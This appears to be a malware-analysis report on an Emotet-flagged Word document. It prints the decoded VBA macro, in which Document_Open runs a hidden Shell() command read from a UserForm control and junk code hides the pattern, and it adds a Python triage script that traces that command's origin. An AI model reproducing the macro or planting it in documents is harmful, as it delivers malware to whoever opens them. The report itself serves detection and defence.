Verdict: MALICIOUS (risk score 222)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The sample is an OOXML (Word) document containing a VBA project with a Document_Open auto-execution routine. On open it calls z(), which hands the return value of fUvmst() to VBA.Shell() with window style 0 (hidden window). fUvmst() does not build the command from a string literal: it instantiates the embedded UserForm fm and reads the command from the text control mynewtxt (fUvmst = yr4a0K.mynewtxt.Text). The command line, most likely a downloader for a secondary payload, therefore does not appear in the extracted VBA source and has to be recovered from the form's storage inside vbaProject.bin. The remaining statements in the macro (typed variables assigned unused numeric constants, a Mid() call whose result is discarded, an arithmetic guard that is never true) are filler intended to defeat signature and heuristic scanners. ClamAV identifies the document as Emotet, a known downloader family.
Heuristics 6
- ClamAV: Doc.Downloader.Emotet-6869634-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6869634-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): the document contains a VBA project, so VBA macros are present
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 16 URLs below were found in document text (OOXML body / shared strings) and are XML namespace URIs declared in the OOXML part headers, not network indicators; the download location used by the macro is not among them:
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2028 bytes | f575305918dae4af09886c96638f780ba1326f452b3af7db3097ac936bd8bd45 |

Preview (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call z
End Sub
Attribute VB_Name = "ET3dl"
Sub yKhfqA()
End Sub
Public Sub z()
Dim iTF0t6MHV As Single
iTF0t6MHV = 51443.538064102
Dim TOn9lamf As Double
TOn9lamf = Sgn(24237.439338447)
Dim gWneoH
gWneoH = LCase(be7fZ)
Dim xuixBz As Integer
xuixBz = Sgn(10512)
Dim IxDeQck As Single
IxDeQck = 41379.156175635
Dim FEhAj3k As Byte
FEhAj3k = 156
Dim tpQR13NzE As Long
tpQR13NzE = -1581512616
Dim lvwYGO8j As Byte
lvwYGO8j = 126
Dim pUFqucYoV As Byte
pUFqucYoV = 29
Dim acL0N8V As Double
acL0N8V = Val(60250.226249357)
Dim QjPW5E As Byte
QjPW5E = 46
Dim vZmAM As Integer
vZmAM = Sgn(27412)
cQIhewDGN = VBA.Shell(fUvmst, 0)
End Sub
Attribute VB_Name = "UyPhS9"
Sub mxHcL1ngG()
End Sub
Sub KflrRbWZc()
End Sub
Attribute VB_Name = "M18aXQk"
Sub IfzUtDq()
End Sub
Public Function fUvmst()
Dim jewN5xGF4 As Double
jewN5xGF4 = Sgn(3.1323832915231)
Dim FoyZEO6 As Integer
FoyZEO6 = -32124
Dim yr4a0K As Object
Set yr4a0K = New fm
Dim iuALWPnso As Double
iuALWPnso = 58152.134397185
ekbswJ8C = "mxKHzoRi1SXQtVNJHsZNr2"
fUPfnbQpu = 32103 / 10701
eyOGI = -3008 + 3016
xVaEh = Mid(ekbswJ8C, fUPfnbQpu, eyOGI)
Dim rWpiO As Double
rWpiO = 40666.530738674
Dim lf6GL As Long
lf6GL = Sgn(0)
Dim qCwh456 As Boolean
qCwh456 = True
If 18045 / 45 = 1188 - 1172 Then
zJyr1Cwup = "AOBkG"
End If
fUvmst = yr4a0K.mynewtxt.Text
End Function
Attribute VB_Name = "fm"
Attribute VB_Base = "0{AA7073C8-E9EB-488D-92E5-788807E9BE1F}{2A58C9F4-1DE7-48AF-9FAB-149F610DA65B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 23552 bytes | 32450fa46d5667529adf066c8be6623b6a6369ac42c9fc966778f616e9562b6e |
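The following script is an added example, not the analyzer's code and not part of the original report. It performs the same source-level triage on the macro preview above that the OLE_VBA_DOCOPEN and OLE_VBA_SHELL heuristics describe, and then goes one step further: it follows the argument of Shell() back through the call graph to the UserForm control it is read from, which is why the extracted source contains no URL or command line. The VBA input is constructed from the report's macros.bas with most of the junk assignments removed; the regular expressions are triage heuristics, not a VBA parser, and the names AUTOEXEC, EXEC_APIS and the finding labels are this example's own. To recover the actual command, the analyst has to read the storage of form fm (its "o" stream) inside vbaProject_00.bin; oletools' olevba can dump those UserForm strings (VBA_Parser.extract_form_strings()), which this offline example does not depend on.

```python
import re

# Constructed input for this added example: the control-flow-relevant lines of
# the sample's macros.bas shown in the report, junk assignments mostly removed.
SAMPLE_VBA = '''
Attribute VB_Name = "ThisDocument"
Sub Document_Open()
Call z
End Sub
Attribute VB_Name = "ET3dl"
Sub yKhfqA()
End Sub
Public Sub z()
Dim iTF0t6MHV As Single
iTF0t6MHV = 51443.538064102
cQIhewDGN = VBA.Shell(fUvmst, 0)
End Sub
Attribute VB_Name = "M18aXQk"
Public Function fUvmst()
Dim yr4a0K As Object
Set yr4a0K = New fm
ekbswJ8C = "mxKHzoRi1SXQtVNJHsZNr2"
fUPfnbQpu = 32103 / 10701
eyOGI = -3008 + 3016
xVaEh = Mid(ekbswJ8C, fUPfnbQpu, eyOGI)
If 18045 / 45 = 1188 - 1172 Then
zJyr1Cwup = "AOBkG"
End If
fUvmst = yr4a0K.mynewtxt.Text
End Function
'''

# Auto-execution entry points (Word and Excel) and execution-capable APIs.
# These lists are this example's own triage heuristics, not the analyzer's.
AUTOEXEC = {"document_open", "autoopen", "auto_open", "workbook_open",
            "document_close", "autoclose", "auto_close", "autoexec"}
EXEC_APIS = ("ShellExecute", "Shell", "CreateObject", "GetObject", "Run", "Exec")

PROC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(.*?\)(.*?)'
    r'^\s*End\s+(?:Sub|Function)', re.S | re.M | re.I)
EXEC_RE = re.compile(r'\b(?:VBA\.)?(' + '|'.join(EXEC_APIS) + r')\s*\(\s*([^,)]+)', re.I)
FORM_REF_RE = re.compile(r'Set\s+(\w+)\s*=\s*New\s+(\w+)', re.I)
PROP_RE = re.compile(r'\b(\w+)\.(\w+)\.(Text|Caption|Tag|Value|ControlTipText)\b', re.I)


def parse_procedures(src):
    """Map procedure name -> body. VBA is case-insensitive, so keys are lowercased."""
    return {m.group(1).lower(): m.group(2) for m in PROC_RE.finditer(src)}


def find_autoexec(procs):
    """Procedures that Office runs without user interaction beyond opening the file."""
    return sorted(n for n in procs if n in AUTOEXEC)


def reachable(procs, start):
    """Procedures reachable from `start` by name reference (Call x, x(...), bare x)."""
    seen, todo = set(), [start.lower()]
    while todo:
        name = todo.pop()
        if name in seen or name not in procs:
            continue
        seen.add(name)
        for ident in re.findall(r'\b(\w+)\b', procs[name]):
            if ident.lower() in procs and ident.lower() not in seen:
                todo.append(ident.lower())
    return seen


def find_exec_calls(procs, names):
    """(procedure, api, first argument) for each execution-capable call in `names`."""
    hits = []
    for n in sorted(names):
        for m in EXEC_RE.finditer(procs[n]):
            hits.append((n, m.group(1), m.group(2).strip()))
    return hits


def command_source(procs, arg):
    """Trace where the string handed to Shell() comes from.

    If the argument is a function whose return value is read from a control on a
    UserForm created with `New`, the command never appears in the VBA source; it
    lives in that form's storage (the 'o' stream) inside vbaProject.bin.
    """
    func = procs.get(arg.lower())
    if func is None:
        return ("literal_or_variable", arg)
    forms = {v.lower(): f for v, f in FORM_REF_RE.findall(func)}
    for obj, ctrl, prop in PROP_RE.findall(func):
        if obj.lower() in forms:
            return ("userform_control", forms[obj.lower()], ctrl, prop)
    return ("function", arg)


def analyze(src):
    """Findings in the spirit of the report's heuristics, plus the command's origin."""
    procs = parse_procedures(src)
    findings = []
    for entry in find_autoexec(procs):
        findings.append(("OLE_VBA_DOCOPEN", entry))
        for proc, api, arg in find_exec_calls(procs, reachable(procs, entry)):
            findings.append(("OLE_VBA_SHELL", f"{proc}: {api}({arg})"))
            findings.append(("COMMAND_SOURCE",) + command_source(procs, arg))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_VBA):
        print(*finding)
```

The last finding is the one the report's source preview cannot show on its own: the command executed by VBA.Shell() is the Text property of control mynewtxt on form fm, so a scanner that only looks at the decompressed module streams for URLs or cmd/powershell strings will find nothing, exactly as the EMBEDDED_URL listing above shows. Pivot to the form storage in vbaProject_00.bin (or to the p-code heuristic, which keys on tokens rather than strings) to get the payload location.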